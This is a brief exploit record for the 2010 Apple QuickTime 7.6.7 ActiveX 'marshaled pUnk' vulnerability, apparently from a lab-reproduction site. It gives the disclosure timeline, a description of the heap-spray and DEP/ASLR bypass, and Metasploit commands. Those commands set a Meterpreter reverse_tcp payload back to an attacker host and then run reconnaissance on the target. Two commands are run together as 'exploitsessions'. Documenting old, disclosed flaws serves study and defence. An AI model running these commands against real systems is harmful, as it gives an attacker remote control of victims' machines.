Timeline :
Vulnerability discovered by HBelite and disclosed to ZDI
Vulnerability disclosed by ZDI to the vendor the 2010-06-30
Exploit-DB PoC provided by Ruben Santamarta the 2010-08-30
Metasploit PoC provided the 2010-08-30
Coordinated vulnerability disclosure the 2010-08-31
PoC provided by :
Ruben Santamarta
jduck
Reference(s) :
Affected version(s) :
Apple QuickTime 7.6.7
Tested on Windows XP SP3 with :
QuickTime 7.6.7
Internet Explorer 8
Description :
This module exploits a memory trust issue in Apple QuickTime 7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX control will treat a supplied parameter as a trusted pointer. It will then use it as a COM-type pUnknown and lead to arbitrary code execution. This exploit utilizes a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions. NOTE: The addresses may need to be adjusted for older versions of QuickTime.
Commands :
use exploit/windows/browser/apple_quicktime_marshaled_punk
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
sysinfo
getuid
ipconfig